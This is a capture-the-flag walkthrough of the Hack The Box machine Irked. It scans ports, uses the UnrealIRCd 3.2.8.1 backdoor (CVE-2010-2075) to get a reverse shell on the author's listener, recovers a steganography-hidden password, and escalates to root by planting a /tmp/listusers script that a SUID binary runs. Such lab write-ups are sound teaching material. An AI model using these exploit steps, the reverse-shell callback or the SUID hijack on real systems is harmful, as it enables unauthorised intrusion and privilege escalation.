Disclaimer

The hosts attacked in this article are legally authorized targets. The tools and methods shown here are for learning and discussion only. Do not use them, or the approach they illustrate, for any illegal purpose; I accept no responsibility for any consequences, misuse or damage arising from them.

Service discovery

Let’s see what ports the target has open

┌──(root💀kali)-[~]
└─# nmap 10.10.10.117 --open -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 03:47 EST
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.25% done; ETC: 03:52 (0:04:30 remaining)
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.68% done; ETC: 03:52 (0:04:25 remaining)
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.19% done; ETC: 03:52 (0:04:16 remaining)
Nmap scan report for 10.10.10.117
Host is up (0.31s latency).
Not shown: 65492 closed ports, 36 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
38540/tcp open  unknown
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 113.95 seconds

Get service and version details for those ports:

┌──(root💀kali)-[~/HTB/Irked]
└─# nmap -sV -p 22,80,111,6697,8067,38540,65534 -Pn -A -O 10.10.10.117
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 03:52 EST
Nmap scan report for 10.10.10.117
Host is up.

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33839/udp   status
|   100024  1          38540/tcp   status
|   100024  1          49259/udp6  status
|_  100024  1          52644/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
38540/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   310.44 ms 10.10.14.12
2   311.20 ms 10.10.10.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.39 seconds

Port 80 serves a home page that is just an image with one line of text:

IRC is almost working!

Directory brute-forcing turns up nothing else, so the only place to start is the IRC service.

Wikipedia's description of IRC:

Internet Relay Chat (IRC) is an application-layer protocol. It is mainly used for group chat, but also supports one-to-one chat. IRC servers conventionally listen on port 6667 (plaintext, e.g. irc://irc.freenode.net) and 6697 (TLS, e.g. ircs://irc.freenode.net:6697), among others.

It sounds like a chat room

Try connecting to the service with nc (nmap fingerprinted 6697, 8067 and 65534 all as UnrealIRCd, so any of them serves as <port> below):

┌──(root💀kali)-[~/HTB/Irked]
└─# nc 10.10.10.117 <port>
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irked.htb 451 10.10.14.3 :You have not registered
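The 451 reply above is the server saying the connection has not completed the NICK/USER registration handshake, so nothing useful comes back to a bare nc. The following is an added example, not code from the writeup or from any tool it uses: a small parser for the IRC server-line format plus a client that registers, sends VERSION and collects the numeric replies, so the daemon version can be confirmed from the 351 (RPL_VERSION) reply before anything intrusive is sent. The sample lines are constructed to mirror the nc session above; the host, port and nick are illustrative assumptions.

```python
import socket
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class IrcMessage:
    """One server line split into prefix, command/numeric and parameters."""
    prefix: Optional[str]
    command: str
    params: List[str] = field(default_factory=list)


def parse_line(line: str) -> IrcMessage:
    """Parse an RFC 1459 line: [:prefix] COMMAND middle-params [:trailing]."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    words = head.split()
    if not words:
        raise ValueError("empty IRC line")
    command, params = words[0], words[1:]
    if sep:
        params.append(trailing)  # the trailing parameter may contain spaces
    return IrcMessage(prefix, command, params)


def registration(nick: str) -> bytes:
    """NICK + USER: the handshake the 451 reply said was missing."""
    return f"NICK {nick}\r\nUSER {nick} 0 * :{nick}\r\n".encode()


def probe_version(host: str, port: int, nick: str = "probe",
                  timeout: float = 10.0) -> Dict[str, IrcMessage]:
    """Register, send VERSION and collect replies keyed by command/numeric.

    351 (RPL_VERSION) carries the daemon's version string. PING is answered
    so the server does not drop the connection mid-handshake.
    """
    replies: Dict[str, IrcMessage] = {}
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(registration(nick))
        sock.sendall(b"VERSION\r\n")
        while True:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
            while b"\n" in buf:
                raw, buf = buf.split(b"\n", 1)
                if not raw.strip():
                    continue
                msg = parse_line(raw.decode("utf-8", "replace"))
                if msg.command == "PING":
                    sock.sendall(f"PONG :{msg.params[-1]}\r\n".encode())
                    continue
                replies[msg.command] = msg
                if msg.command in ("351", "ERROR"):
                    sock.sendall(b"QUIT\r\n")
                    return replies
    return replies


# Constructed sample modelled on the nc session above (not captured traffic).
SAMPLE_LINES = [
    ":irked.htb NOTICE AUTH :*** Looking up your hostname...",
    ":irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead",
    ":irked.htb 451 10.10.14.3 :You have not registered",
]


def summarize(lines: List[str]) -> Dict[str, int]:
    """Count replies by command/numeric; a 451 means 'send NICK/USER first'."""
    counts: Dict[str, int] = {}
    for line in lines:
        cmd = parse_line(line).command
        counts[cmd] = counts.get(cmd, 0) + 1
    return counts


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        for cmd, msg in probe_version(sys.argv[1], int(sys.argv[2])).items():
            print(cmd, msg.params)
    else:
        print(summarize(SAMPLE_LINES))
```

Run it as `python3 ircprobe.py 10.10.10.117 <port>` against a live host; with no arguments it only parses the constructed sample. On a server that honours VERSION, the params of the 351 reply contain the version string, which is the check to make before reaching for an exploit that targets one specific release.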

The initial shell

A Google search for UnrealIRCd turns up the well-known backdoor in this service: the UnrealIRCd 3.2.8.1 source tarball distributed from the project's mirrors in late 2009 and early 2010 was trojaned (CVE-2010-2075), and any line a client sends that begins with "AB;" is handed straight to system() on the server, before registration. A ready-made exploit for it is on GitHub.

Modify these two lines of code:

local_ip = '10.10.14.3'  # CHANGE THIS
local_port = '4242'      # CHANGE THIS

Start a listener on that port:

nc -lnvp 4242

Run the exploit against the target (the same IRC <port> as before):

┌──(root💀kali)-[~/HTB/Irked]
└─# python3 irc_exp.py 10.10.10.117 <port> -payload python
Exploit sent successfully!

The reverse shell comes back on the listener:

┌──(root💀kali)-[~/HTB/Irked]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.117] 55352
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd
ircd@irked:~/Unreal3.2$

user.txt is in djmardov's home directory, and the ircd user has no permission to read it.

Privilege escalation to djmardov

There is a hidden backup file in the Documents directory next to user.txt:

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss


It looks like it could be djmardov's password, but su djmardov does not accept it. The first line of the file is the real hint: this is the password for a steganography ("steg") backup, not a login password.

Super elite steg backup pw

Steganography hides data inside another file, usually an image. The only image we have seen is the one on the port 80 home page, so download it (saved locally here as irked.jpg) and ask steghide to extract the hidden file using the password from .backup:

┌──(root💀kali)-[~/HTB/Irked]
└─# steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
┌──(root💀kali)-[~/HTB/Irked]
└─# cat pass.txt
Kab6h+m+bbp2J:HG

This yields a pass.txt containing: Kab6h+m+bbp2J:HG

That is djmardov's password. Switch user and read user.txt (if su complains that it must be run from a terminal, upgrade the reverse shell to a pty first, e.g. python -c 'import pty; pty.spawn("/bin/bash")'):

ircd@irked:/home/djmardov/Documents$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:~/Documents$ cat user.txt
cat user.txt

Privilege escalation to root

Run LinPEAS and look at the SUID binaries:

════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-- 1 root messagebus 355K Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper (Unknown SUID binary)
-rwsr-xr-x 1 root root 9.3K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device (Unknown SUID binary)
-rwsr-xr-x 1 root root 14K Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 550K Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14K Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper (Unknown SUID binary)
-rwsr-xr-x 1 root root 1.1M Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 332K Apr 14  2015 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 43K May 17  2017 /usr/bin/chsh (Unknown SUID binary)
-rwsr-sr-x 1 root mail 94K Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 77K May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38K May 17  2017 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-sr-x 1 daemon daemon 50K Sep 30  2014 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 18K Sep  8  2016 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-sr-x 1 root root 9.3K Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root root 52K May 17  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 52K May 17  2017 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 7.2K May 16  2018 /usr/bin/viewuser (Unknown SUID binary)
-rwsr-xr-x 1 root root 95K Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38K May 17  2017 /bin/su
-rwsr-xr-x 1 root root 34K Mar 29  2015 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 34K Jan 21  2016 /bin/fusermount (Unknown SUID binary)
-rwsr-xr-x 1 root root 158K Jan 28  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 26K Mar 29  2015 /bin/umount  --->  BSD/Linux(08-1996)

One of these looks fishy to me: /usr/bin/viewuser. It is not part of any standard Debian package, and LinPEAS flags it as an unknown SUID binary.

Inspect it with strings:

djmardov@irked:/tmp$ strings /usr/bin/viewuser
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
puts
system
__cxa_finalize
__libc_start_main
GLIBC_2.0
GLIBC_2.3
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
UWVS
[^_]
This application is being devleoped to set and test user permissions
It is still being actively developed
/tmp/listusers

The imported symbols tell the story: the binary calls setuid() and then system() with the string /tmp/listusers, i.e. it runs /bin/sh -c /tmp/listusers with root privileges.

/tmp/listusers does not exist, and /tmp is writable by everyone.

That makes it easy. Create the listusers file:

touch /tmp/listusers

Write the command to run into it (no shebang is needed: system() hands the path to /bin/sh, which executes it as a script):

echo "bash -p" > /tmp/listusers

Make it executable:

chmod +x listusers

Run the SUID binary and the shell that comes back is root. Because setuid(0) in a setuid-root process sets the real uid as well as the effective uid, even a plain bash would keep root here; -p is still the right habit, since bash drops an effective uid that differs from the real one. The gid stays 1000 because viewuser never calls setgid():

djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-12-22 05:03 (:0)
djmardov  pts/1        2021-12-22 05:14 (10.10.14.3)
root@irked:/tmp# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:/tmp# whoami
root
root@irked:/tmp# cat /root/root.txt